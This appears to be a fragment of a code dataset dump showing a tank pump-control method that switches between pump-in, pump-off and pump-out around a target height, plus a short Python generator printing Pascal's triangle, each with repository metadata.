pump should be turned to PUMP_OUT.
3. If the pump is off and the height is within the margin region or on
the exact boundary of the margin region, then the pump shall remain at
PUMP_OFF.
4. If the pump is performing PUMP_IN and the height is above the target
height, then the pump shall be turned to PUMP_OFF, otherwise the pump
shall remain at PUMP_IN.
5. If the pump is performing PUMP_OUT and the height is below the target
height, then the pump shall be turned to PUMP_OFF, otherwise, the pump
shall remain at PUMP_OUT.
:param current_height: the current height of liquid in the tank
:param current_action: the current action of the pump
:param actions: a dictionary containing the keys 'PUMP_IN', 'PUMP_OFF',
and 'PUMP_OUT'
:return: The new action for the pump: one of actions['PUMP_IN'], actions['PUMP_OUT'],
actions['PUMP_OFF']
"""
if current_action == actions['PUMP_OFF']:
if current_height < self.target_height - self.margin:
next_action = actions['PUMP_IN']
elif current_height > self.target_height + self.margin:
next_action = actions['PUMP_OUT']
else:
next_action = actions['PUMP_OFF']
elif current_action == actions['PUMP_IN']:
if current_height > self.target_height:
next_action = actions['PUMP_OFF']
else:
next_action = actions['PUMP_IN']
else:
if current_height < self.target_height:
next_action = actions['PUMP_OFF']
else:
next_action = actions['PUMP_OUT']
return next_action
|
[
"kmsnyder2@verizon.net"
] |
kmsnyder2@verizon.net
|
f64ad10e4891ecd5d12b68ca45714966f1a8b852
|
1cc17b2eb1c885389126299602dbaa3bbd1e6dd7
|
/liaoxuefeng_python/base/demo09.py
|
0db64ffc3cdfddd6f88c8a49b443f24fc835d0c8
|
[] |
no_license
|
shulu/python_note
|
e611093ff2af321fbc889167424574b214052b44
|
93b101a1723d2d47b435a25e81e447f0d5d95022
|
refs/heads/master
| 2021-01-02T22:47:53.717930
| 2019-03-26T08:55:48
| 2019-03-26T08:55:48
| 99,391,822
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 237
|
py
|
# -*- coding: utf-8 -*-
def triangles():
L=[1]
while True:
yield L
L = [1] + [ L[x-1] + L[x] for x in range(1,len(L)) ] + [1]
n = 0
for t in triangles():
print(t)
n = n + 1
if n == 10:
break
|
[
"qq961085397@163.com"
] |
qq961085397@163.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.